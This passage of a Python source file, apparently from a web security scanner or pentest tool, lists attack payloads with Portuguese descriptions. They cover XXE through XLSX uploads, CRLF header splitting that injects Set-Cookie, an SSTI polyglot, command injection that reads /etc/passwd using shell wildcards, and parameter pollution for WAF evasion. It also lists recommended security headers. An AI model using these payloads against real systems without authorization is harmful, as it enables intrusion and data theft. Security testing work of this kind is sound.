        "technique": "xxe_xlsx_upload",
        "payload": "XLSX (ZIP) com XML interno contendo ENTITY externa apontando para recurso interno",
        "category": "XXE / LFI",
        "description": "Arquivos XLSX são ZIPs com XML. XXE no XML interno pode vazar arquivos do servidor.",
        "effectiveness": "Alta em funcionalidades de importação de planilhas",
    },
    {
        "name": "CRLF Injection Header Splitting",
        "technique": "crlf_header_split",
        "payload": "param=%0d%0aSet-Cookie:%20session=malicious%3b%20Path%3d%2f",
        "category": "Header Injection",
        "description": "Injeta CRLF em parâmetros refletidos em headers. Permite injetar Set-Cookie e outros headers.",
        "effectiveness": "Média; eficaz quando output não é sanitizado antes de headers",
    },
    {
        "name": "SSTI Polyglot Multi-Engine",
        "technique": "ssti_polyglot",
        "payload": "{{7*7}}${7*7}<%=7*7%>#{7*7}*{7*7}",
        "category": "SSTI / Template Injection",
        "description": "Combina sintaxes de Jinja2, Freemarker, ERB, Ruby e Smarty. Detecta engine e pode resultar em RCE.",
        "effectiveness": "Alta para identificação; WAFs raramente bloqueiam todos os patterns",
    },
    {
        "name": "Wildcard Glob in OS Command Injection",
        "technique": "wildcard_glob_cmdi",
        "payload": "cmd=cat+/etc/pa??wd",
        "category": "OS Command Injection",
        "description": "Wildcards do shell no lugar de strings literais. Bypassa regras de matching exato de nomes de arquivo.",
        "effectiveness": "Alta em injection de comandos OS com shell envolvido",
    },
    {
        "name": "HTTP Parameter Pollution (HPP)",
        "technique": "http_param_pollution",
        "payload": "?id=1&id=2%20OR%201=1 (parâmetro duplicado)",
        "category": "SQLi / WAF Evasion",
        "description": "Envia o mesmo parâmetro múltiplas vezes. WAFs que avaliam apenas a primeira ocorrência são bypassados.",
        "effectiveness": "Média; eficaz em WAFs que não consolidam parâmetros duplicados",
    }
]


SECURITY_HEADERS = {
    "Strict-Transport-Security": {
        "recommended": "max-age=31536000; includeSubDomains; preload",
        "severity": "HIGH",
        "description": "Força HTTPS por 1 ano. Previne downgrade attacks e cookie hijacking via MitM.",
    },
    "Content-Security-Policy": {
        "recommended": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
        "severity": "HIGH",
        "description": "Previne XSS e data injection. Define fontes permitidas de scripts, estilos e objetos.",
    },
    "X-Frame-Options": {
        "recommended": "DENY",
        "severity": "MEDIUM",
        "description": "Previne Clickjacking bloqueando embedding em iframes.",
    },
    "X-Content-Type-Options": {
        "recommended": "nosniff",
        "severity": "MEDIUM",
        "description": "Previne MIME type sniffing. Bloqueia scripts disfarçados como outros tipos.",
    },
    "Referrer-Policy": {
        "recommended": "strict-origin-when-cross-origin",
        "severity": "LOW",
        "description": "Controla informações no header Referer ao navegar entre origens.",
    },
    "Permissions-Policy": {
        "recommended": "geolocation=(), microphone=(), camera=(), payment=(), usb=()",
        "severity": "LOW",
        "description": "Restringe acesso a APIs sensíveis do navegador.",
    },
    "X-XSS-Protection": {
        "recommended": "1; mode=block",
        "severity": "LOW",
        "description": "Filtro XSS em browsers legados. Descontinuado em browsers modernos.",
    },
    "Cache-Control": {
        "recommended": "no-store, no-cache, must-revalidate, max-age=0",
        "severity": "LOW",
        "description": "Controla cache de conteúdo sensível. Previne armazenamento em cache.",
    },
}
